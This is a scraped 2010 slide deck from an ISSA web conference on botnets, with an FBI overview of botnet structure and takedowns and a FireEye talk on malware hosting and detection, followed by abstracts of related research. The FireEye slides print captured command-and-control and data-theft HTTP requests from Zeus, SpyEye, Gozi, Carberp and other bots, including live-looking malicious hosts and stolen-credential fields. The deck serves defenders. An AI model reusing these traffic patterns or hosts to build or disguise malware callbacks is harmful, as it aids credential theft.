DOCSLIB.ORG

Botnets Sponsored By

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Botnets Sponsored By Botnets Sponsored by: ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London 1 Welcome: Conference Moderator Phillip H Griffin Member - ISSA Educational Advisory Council, Web Conferences Committee 2 Agenda • How Botnets Have Evolved – Chris Calderon - Special Agent, FBI • Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye • Joint Speaker Question & Answer • Closing Comments 3 UNCLASSIFIED How Botnets Have Evolved presented by Special Agent Chris Calderon FBI UNCLASSIFIED UNCLASSIFIED Agenda • What is a botnet? • How are botnets created? • Why are botnets created? • Basic structure of a botnet • Taking down a botnet • How botnets are evolving • Botnets in the news • Questions UNCLASSIFIED UNCLASSIFIED What is a botnet? • A network of compromised computers (robots/bots) • Controlled by a bot master / herder • Used to carry out various illegal activities • Services are often sold to other criminal elements UNCLASSIFIED UNCLASSIFIED How are botnets created? • Obtain reliable infrastructure Setup • Develop malware and C&C software • Malware loaded onto victim machines Victims • Done through exploits and/or social engineering • Continually update software / instructions to bots Manage • Maintain statistics for the botnet UNCLASSIFIED UNCLASSIFIED Why are botnets created? • Spam • Distributed Denial of Service (DDoS) • Click Fraud • Fake Anti-Virus • Credential Theft • Proxy Service • Cyber Warfare UNCLASSIFIED UNCLASSIFIED Basic Structure Victim C&C Server Bot Master / Victim Herder C&C Victim Server UNCLASSIFIED UNCLASSIFIED Taking down a botnet Victim C&C Server Bot Master / Victim Herder C&C Victim Server UNCLASSIFIED UNCLASSIFIED Botnets evolving Proxy Victim C&C Server Victim Proxy Bot Master / Herder Victim C&C Proxy Victim Server UNCLASSIFIED UNCLASSIFIED Botnets evolving Proxy Victim C&C Proxy Server Victim Proxy Bot Master / Herder Victim C&C Proxy Proxy Victim Server UNCLASSIFIED UNCLASSIFIED Botnets in the news • ZEUS – Steels and logs online banking credentials – Primarily targets high balance accounts – Money “mules” used to get money to bad actors – Kit now used by many different groups – Estimated $70,000,000 stolen from US banks UNCLASSIFIED UNCLASSIFIED Botnets in the news • MARIPOSA (BUTTERFLY) – Steels online credentials, and also used in DDoS attacks – Estimated 12 million infected computers – Bad actors traced to Spain and arrested – Criminal proceedings ongoing UNCLASSIFIED UNCLASSIFIED Botnets in the news • SPAM BOTS – Conficker, Cutwail, Waledac, …. – Up to 10 million bots per botnet – Each botnet can send billions of spam emails per day – Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, …. UNCLASSIFIED UNCLASSIFIED Questions? UNCLASSIFIED Rooting out the Bad Actors or: p2p, fast flux, and other botnet myths Alex Lanstein Senior Security Researcher FireEye, Inc. Today’s Agenda • Understanding the shift from conventional to modern malware, and the resultant hosting needs • A few TT&P to uncover older or moderately sophisticated malware • A detailed looked a few bots “in the news” 2 18 Conventional vs. Modern, APT Malware Conventional Malware • Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots • Detectable through a variety of technologies/tactics: – NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS – Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc. 3 19 Conventional vs. Modern Malware Modern-ish malware: – Characterized by infecting via browser based exploits – Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s) – Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye – Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed 4 20 World’s Top Malware Source: FireEye Malware Intelligence Lab 21 21 Modern Malware Infection Lifecycle 1 System gets exploited . Drive-by attacks in casual browsing . Links in Targeted Emails Compromised . Socially engineered binaries Web server, or Callback Server Web 2.0 site 2 Dropper malware installs . First step to establish control . Calls back out to criminal servers Perimeter Security Signature, rule-based . Found on compromised sites, and Web 2.0, user-created content sites Other gateway 3 Malicious data theft & long- List-based, signatures term control established . Uploads data stolen via keyloggers, Trojans, bots, & file grabbers . One exploit leads to dozens of infections on same system . Criminals have built long-term control mechanisms into system Desktop antivirus Losing the threat arms race 22 22 Where is all this malware being hosted? • Previously we used to see malware being hosted on infected home machines • Web filters responded by blocking access to domains that had multiple A records in residential IP space • Now it’s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space! 23 Root of the Problem • There is no “Internet Police”! • Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs? • Depends who you ask and how big a stink you make. 24 How the Internet is delegated In the name space (think DNS): • ICANN Registries • Registries == Verisign, Affilias, ccTLD operators • Registries sell to certified gTLD and regional registrars • Registrars == namecheap.com, godaddy.com, netsol.com • Registrars sell to registrants (end user) 25 How the Internet is delegated In the IP space: • ICANN/IANA (Internet Assigned Numbers Authority) • IANA RIRs • RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC • RIRs LIRs • LIRs are generally data centers and ISPs 26 27 28 29 ICANN’t do anything! • ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn’t violate the contract. These contracts have no mention of “content”. • Recent success against EstDomains was due to them having a convicted felon as an Officer of the company. • Large pushback when someone even suspects they are trying to take an authoritative stance on something. 30 31 32 Big bots in 2010 Rustock – still sticking around POST /index.php?topic=33.117 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://go-thailand-now.com/ Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache 18 34 Gozi POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary=-------------------------- 139b9b3139b9b3139b9b3 User-Agent: IE Host: 91.216.215.130 Content-Length: 453 Pragma: no-cache ----------------------------139b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename="3759777034.21" Content-Type: application/octet-stream URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove ----------------------------139b9b3139b9b3139b9b3-- 19 35 Zeus POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache . ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q.. '7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.......- [email protected]>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:........".....;5..U. .t....!......f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>....0Y,.. ..".<. 20 36 Tigger – Not just financials anymore POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L . SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timez oneOct=4 20&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true &aw charset=UTF-8&KEYLOG=s}}} 21 37 SpyEye – ZeuS replacement? GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232 &ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKL AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: www.promohru.in Pragma: no-cache 22 38 Carberp – Yet Another Datastealer POST /recv.php HTTP/1.1 Host: 194.54.80.146 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1 &data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7
Load more

Recommended publications
  • Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress
    Order Code RL32114 Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress Updated January 29, 2008 Clay Wilson Specialist in Technology and National Security Foreign Affairs, Defense, and Trade Division Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress Summary Cybercrime is becoming more organized and established as a transnational business. High technology online skills are now available for rent to a variety of customers, possibly including nation states, or individuals and groups that could secretly represent terrorist groups. The increased use of automated attack tools by cybercriminals has overwhelmed some current methodologies used for tracking Internet cyberattacks, and vulnerabilities of the U.S. critical infrastructure, which are acknowledged openly in publications, could possibly attract cyberattacks to extort money, or damage the U.S. economy to affect national security. In April and May 2007, NATO and the United States sent computer security experts to Estonia to help that nation recover from cyberattacks directed against government computer systems, and to analyze the methods used and determine the source of the attacks.1 Some security experts suspect that political protestors may have rented the services of cybercriminals, possibly a large network of infected PCs, called a “botnet,” to help disrupt the computer systems of the Estonian government. DOD officials have also indicated that similar cyberattacks from individuals and countries targeting economic,
    [Show full text]
  • GQ: Practical Containment for Measuring Modern Malware Systems
    GQ: Practical Containment for Measuring Modern Malware Systems Christian Kreibich Nicholas Weaver Chris Kanich ICSI & UC Berkeley ICSI & UC Berkeley UC San Diego [email protected] [email protected] [email protected] Weidong Cui Vern Paxson Microsoft Research ICSI & UC Berkeley [email protected] [email protected] Abstract their behavior, sometimes only for seconds at a time (e.g., to un- Measurement and analysis of modern malware systems such as bot- derstand the bootstrapping behavior of a binary, perhaps in tandem nets relies crucially on execution of specimens in a setting that en- with static analysis), but potentially also for weeks on end (e.g., to ables them to communicate with other systems across the Internet. conduct long-term botnet measurement via “infiltration” [13]). Ethical, legal, and technical constraints however demand contain- This need to execute malware samples in a laboratory setting ex- ment of resulting network activity in order to prevent the malware poses a dilemma. On the one hand, unconstrained execution of the from harming others while still ensuring that it exhibits its inher- malware under study will likely enable it to operate fully as in- ent behavior. Current best practices in this space are sorely lack- tended, including embarking on a large array of possible malicious ing: measurement researchers often treat containment superficially, activities, such as pumping out spam, contributing to denial-of- sometimes ignoring it altogether. In this paper we present GQ, service floods, conducting click fraud, or obscuring other attacks a malware execution “farm” that uses explicit containment prim- by proxying malicious traffic.
    [Show full text]
  • The Blaster Worm: Then and Now
    Worms The Blaster Worm: Then and Now The Blaster worm of 2003 infected at least 100,000 Microsoft Windows systems and cost millions in damage. In spite of cleanup efforts, an antiworm, and a removal tool from Microsoft, the worm persists. Observing the worm’s activity can provide insight into the evolution of Internet worms. MICHAEL n Wednesday, 16 July 2003, Microsoft and continued to BAILEY, EVAN Security Bulletin MS03-026 (www. infect new hosts COOKE, microsoft.com/security/incident/blast.mspx) more than a year later. By using a wide area network- FARNAM O announced a buffer overrun in the Windows monitoring technique that observes worm infection at- JAHANIAN, AND Remote Procedure Call (RPC) interface that could let tempts, we collected observations of the Blaster worm DAVID WATSON attackers execute arbitrary code. The flaw, which the during its onset in August 2003 and again in August 2004. University of Last Stage of Delirium (LSD) security group initially This let us study worm evolution and provides an excel- Michigan uncovered (http://lsd-pl.net/special.html), affected lent illustration of a worm’s four-phase life cycle, lending many Windows operating system versions, including insight into its latency, growth, decay, and persistence. JOSE NAZARIO NT 4.0, 2000, and XP. Arbor When the vulnerability was disclosed, no known How the Blaster worm attacks Networks public exploit existed, and Microsoft made a patch avail- The initial Blaster variant’s decompiled source code re- able through their Web site. The CERT Coordination veals its unique behavior (http://robertgraham.com/ Center and other security organizations issued advisories journal/030815-blaster.c).
    [Show full text]
  • Containing Conficker to Tame a Malware
    &#4#5###4#(#%#5#6#%#5#&###,#'#(#7#5#+#&#8##9##:65#,-;/< Know Your Enemy: Containing Conficker To Tame A Malware The Honeynet Project http://honeynet.org Felix Leder, Tillmann Werner Last Modified: 30th March 2009 (rev1) The Conficker worm has infected several million computers since it first started spreading in late 2008 but attempts to mitigate Conficker have not yet proved very successful. In this paper we present several potential methods to repel Conficker. The approaches presented take advantage of the way Conficker patches infected systems, which can be used to remotely detect a compromised system. Furthermore, we demonstrate various methods to detect and remove Conficker locally and a potential vaccination tool is presented. Finally, the domain name generation mechanism for all three Conficker variants is discussed in detail and an overview of the potential for upcoming domain collisions in version .C is provided. Tools for all the ideas presented here are freely available for download from [9], including source code. !"#$%&'()*+&$(% The big years of wide-area network spreading worms were 2003 and 2004, the years of Blaster [1] and Sasser [2]. About four years later, in late 2008, we witnessed a similar worm that exploits the MS08-067 server service vulnerability in Windows [3]: Conficker. Like its forerunners, Conficker exploits a stack corruption vulnerability to introduce and execute shellcode on affected Windows systems, download a copy of itself, infect the host and continue spreading. SRI has published an excellent and detailed analysis of the malware [4]. The scope of this paper is different: we propose ideas on how to identify, mitigate and remove Conficker bots.
    [Show full text]
  • THE CONFICKER MYSTERY Mikko Hypponen Chief Research Officer F-Secure Corporation Network Worms Were Supposed to Be Dead. Turns O
    THE CONFICKER MYSTERY Mikko Hypponen Chief Research Officer F-Secure Corporation Network worms were supposed to be dead. Turns out they aren't. In 2009 we saw the largest outbreak in years: The Conficker aka Downadup worm, infecting Windows workstations and servers around the world. This worm infected several million computers worldwide - most of them in corporate networks. Overnight, it became as large an infection as the historical outbreaks of worms such as the Loveletter, Melissa, Blaster or Sasser. Conficker is clever. In fact, it uses several new techniques that have never been seen before. One of these techniques is using Windows ACLs to make disinfection hard or impossible. Another is infecting USB drives with a technique that works *even* if you have USB Autorun disabled. Yet another is using Windows domain rights to create a remote jobs to infect machines over corporate networks. Possibly to most clever part is the communication structure Conficker uses. It has an algorithm to create a unique list of 250 random domain names every day. By precalcuting one of these domain names and registering it, the gang behind Conficker could take over any or all of the millions of computers they had infected. Case Conficker The sustained growth of malicious software (malware) during the last few years has been driven by crime. Theft – whether it is of personal information or of computing resources – is obviously more successful when it is silent and therefore the majority of today's computer threats are designed to be stealthy. Network worms are relatively "noisy" in comparison to other threats, and they consume considerable amounts of bandwidth and other networking resources.
    [Show full text]
  • Modeling of Computer Virus Spread and Its Application to Defense
    University of Aizu, Graduation Thesis. March, 2005 s1090109 1 Modeling of Computer Virus Spread and Its Application to Defense Jun Shitozawa s1090109 Supervised by Hiroshi Toyoizumi Abstract 2 Two Systems The purpose of this paper is to model a computer virus 2.1 Content Filtering spread and evaluate content filtering and IP address blacklisting with a key parameter of the reaction time R. Content filtering is a containment system that has a We model the Sasser worm by using the Pure Birth pro- database of content signatures known to represent par- cess in this paper. Although our results require a short ticular worms. Packets containing one of these signa- reaction time, this paper is useful to obviate the outbreak tures are dropped when a containment system member of the new worms having high reproduction rate λ. receives the packets. This containment system is able to stop computer worm outbreaks immediately when the systems obtain information of content signatures. How- 1 Introduction ever, it takes too much time to create content signatures, and this system has no effect on polymorphic worms In recent years, new computer worms are being created at a rapid pace with around 5 new computer worms per a [10]. A polymorphic worm is one whose code is trans- day. Furthermore, the speed at which the new computer formed regularly, so no single signature identifies it. worms spread is amazing. For example, Symantec [5] 2.2 The IP Address Blacklisting received 12041 notifications of an infection by Sasser.B in 7 days. IP address blacklisting is a containment system that has Computer worms are a kind of computer virus.
    [Show full text]
  • [Recognising Botnets in Organisations] Barry Weymes Number
    [Recognising Botnets in Organisations] Barry Weymes Number: 662 A thesis submitted to the faculty of Computer Science, Radboud University in partial fulfillment of the requirements for the degree of Master of Science Eric Verheul, Chair Erik Poll Sander Peters (Fox-IT) Department of Computer Science Radboud University August 2012 Copyright © 2012 Barry Weymes Number: 662 All Rights Reserved ABSTRACT [Recognising Botnets in Organisations] Barry WeymesNumber: 662 Department of Computer Science Master of Science Dealing with the raise in botnets is fast becoming one of the major problems in IT. Their adaptable and dangerous nature makes detecting them difficult, if not impossible. In this thesis, we present how botnets function, how they are utilised and most importantly, how to limit their impact. DNS Dynamic Reputations Systems, among others, are an innovative new way to deal with this threat. By indexing individual DNS requests and responses together we can provide a fuller picture of what computer systems on a network are doing and can easily provide information about botnets within the organisation. The expertise and knowledge presented here comes from the IT security firm Fox-IT in Delft, the Netherlands. The author works full time as a security analyst there, and this rich environment of information in the field of IT security provides a deep insight into the current botnet environment. Keywords: [Botnets, Organisations, DNS, Honeypot, IDS] ACKNOWLEDGMENTS • I would like to thank my parents, whom made my time in the Netherlands possible. They paid my tuition, and giving me the privilege to follow my ambition of getting a Masters degree. • My dear friend Dave, always gets a mention in my thesis for asking the questions other dont ask.
    [Show full text]
  • Breach Detection: What You Need to Know
    Breach Detection: What you need to know. Detection and Stopping Advanced Attacks eBook Table Of Contents From Computer Games to War Games . .. 4 Digital Data: The New Competitive Advantage . 5 Warp Speed of Attack . 6 Targeting . .. 7 Penetration via Endpoints . 8 Reconnaissance. .. 9 Paths of Attack . 10 From Digits to Diamonds . 11 Exfiltration. 12 Persistence, Cleanup and Cover-up . 13 Conventional Defenses are too Slow . 14 Detection must be Automatic . 15 Cb Enterprise Protection Advanced Threat Indicators . 16 Get Ahead of Advanced Threats. .. 17 Breach Detection: What You Need To Know 2 eBook Introduction Today’s cyber attacks have changed in sophistication, in focus, and in their potential impact on your business . This eBook will outline the tactics today’s advanced attackers are using to break into your organization and why you require a defense-in-depth cybersecurity program that incorporates automatic detection and incident response . The goal of this ebook is to leave you with the knowledge you need to effectively protect your business against today’s advanced attacks . Who should read this ebook? • CISO/IT Prepare a business case for effective security solutions • CFO Understand the financial implications posed by advanced threats • CXO Answer the concerns of your board and stockholders Breach Detection: What You Need To Know 3 eBookWhitepaper From Computer Games to War Games Hacking used to be a game: an opportunity for the most clever and ambitious in the tech community to show off their skills and superiority — this was
    [Show full text]
  • Optimization of Blaster Worms by Stochastic Modeling
    University of Aizu, Graduation Thesis. March, 2004 s1080060 1 Optimization of Blaster worms by Stochastic Modeling Tatehiro Kaiwa s1080060 Supervised by Hiroshi Toyoizumi Abstract Birth Process. The purpose in this paper is to compare the difference between the existing Blaster worms and the optimized 2 Blaster ones in local network. In the paper, we investigate ac- tivities of the Blaster worms, and optimize the Blaster 2.1 Target Virus worms by using stochastic modeling. We use two kinds The target virus in this paper is called ”Blaster.” The of Pure Birth Process, Poisson Process and Yule Process. Blaster worm was discovered in August 11, 2003. The work is helpful for preparing the outbreak of the The virus was categorized Worm type. The worm is unknown worms similar to the Blaster worm. also known as W32/Lovsan.a, Win32.Poza.A, Lovsan, WORM MSBLAST A, W32/Blaster-A, W32/Blaster, 1 Introduction Worm.Win32.Lovsan and W32/Blaster.A. In recent years, many computer worms have attacked 2.1.1 Virus activities on the PC many PCs connected to the Internet. Computer worms are kind of computer virus, the worm makes a copy of When the Blaster worm is executed, the worm first itself and spreads throughout the Internet through many checks to see whether Blaster worm is running. If the PC methods. In this process, the worms attack many PCs is already infected has mutex exclude what Blaster worm connected to the Internet. In a few years, it will be possi- runs mutually, the worm does not run two or more in the ble for a computer to be infected by a computer worm by same PC at the same time.
    [Show full text]
  • Conficker – One Year After
    Conficker – One Year After Disclaimer The information and data asserted in this document represent the current opin- ion of BitDefender® on the topics addressed as of the date of publication. This document and the information contained herein should not be interpreted in any way as a BitDefender’s commitment or agreement of any kind. Although every precaution has been taken in the preparation of this document, the publisher, authors and contributors assume no responsibility for errors and/or omissions. Nor is any liability assumed for damages resulting from the use of the information contained herein. In addition, the information in this document is subject to change without prior notice. BitDefender, the publisher, authors and contributors cannot guarantee further related document issuance or any possible post -release information. This document and the data contained herein are for information purposes only. BitDefender, the publisher, authors and contributors make no warranties, express, implied, or statutory, as to the information stated in this document. The document content may not be suitable for every situation. If professional assistance is required, the services of a competent professional person should be sought. Neither BitDefender, the document publishers, authors nor the con- tributors shall be liable for damages arising here from. The fact that an individual or organization, an individual or collective work, in- cluding printed materials, electronic documents, websites, etc., are referred in this document as a citation and/or source of current or further information does not imply that BitDefender, the document publisher, authors or contributors en- dorses the information or recommendations the individual, organization, inde- pendent or collective work, including printed materials, electronic documents, websites, etc.
    [Show full text]
  • Rogueware Analysis of the New Style of Online Fraud Pandalabs Sean‐Paul Correll ‐ Luis Corrons the Business of Rogueware Analysis of the New Style of Online Fraud
    The Business of Rogueware Analysis of the New Style of Online Fraud PandaLabs Sean‐Paul Correll ‐ Luis Corrons The Business of Rogueware Analysis of the New Style of Online Fraud Executive Summary 3 Background: The History of Malware Growth 4 Rogueware 7 - The Effects of Fake Antivirus Programs 7 - Evolution of Rogue AV from 2008 to Q2 2009, and Predictions for the Future 9 - Rogue infections in H1 2009 12 - The Financial Ramifications 13 - A Look Inside of the Rogueware Business 14 - The Affiliate System 15 - Where is it all coming from? 18 - Rogueware Distribution 19 - Top 5 Attacks in Social Media 20 Conclusion 24 The authors 25 © Panda Security 2009 Page 2 The Business of Rogueware Analysis of the New Style of Online Fraud Executive Summary In recent years, the proliferation of malware has been widespread and the threats have reached staggering proportions. Cybercrime has unfortunately become a part of a hidden framework of our society and behind this growing trend lies a type of malware called rogueware; a breed that is more pervasive and dangerous than threats previously seen by security researchers. Rogueware consists of any kind of fake software solution that attempts to steal money from PC users by luring them into paying to remove nonexistent threats. At the end of 2008, PandaLabs detected almost 55,000 rogueware samples. This study seeks to investigate the growing rogueware economy, its astounding growth and the effects it has had thus far. The study revealed staggering results: • We predict that we will record more than 637,000 new rogueware samples by the end of Q3 2009, a tenfold increase in less than a year • Approximately 35 million computers are newly infected with rogueware each month (approximately 3.50 percent of all computers) • Cybercriminals are earning approximately $34 million per month through rogueware attacks © Panda Security 2009 Page 3 The Business of Rogueware Analysis of the New Style of Online Fraud Background: The History of Malware Growth Malware has rapidly increased in volume and sophistication over in the past several years.
    [Show full text]
  • On Detection of Current and Next-Generation Botnets
    On Detection of Current and Next-Generation Botnets by Yuanyuan Zeng A dissertation submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy (Computer Science and Engineering) in The University of Michigan 2012 Doctoral Committee: Professor Kang G. Shin, Chair Professor Atul Prakash Assistant Professor Qiaozhu Mei Assistant Research Scientist Michael Donald Bailey ⃝c Yuanyuan Zeng 2012 All Rights Reserved To my parents and my grandma, who are always there for me. ii ACKNOWLEDGEMENTS First and foremost, I would like to express my deepest gratitude to my advisor, Professor Kang G. Shin, without whom I would not be here writing this dissertation. During my PhD journey, there have been wonderful times and difficult times. Pro- fessor Shin always supported, encouraged, guided, and most importantly, believed in me. He gave me a lot of flexibility to pursue topics whatever interested me and helped me build more confidence in myself. I have been very fortunate and proud to work under his supervision. I also want to thank my committee members, Profes- sor Atul Prakash, Professor Qiaozhu Mei and Dr. Michael Bailey, for reviewing my dissertation and providing constructive comments that help me improve my work. I would like to acknowledge my collaborators for their constant support and in- valuable input to my research. Special thanks to Dr. Xin Hu for collaborating with me throughout all these years. He offered a lot of help and advices on my research, and wonderful friendship. Thanks to Dr. Guanhua Yan at Los Alamos National Laboratory, for being an incredible mentor and a caring friend.
    [Show full text]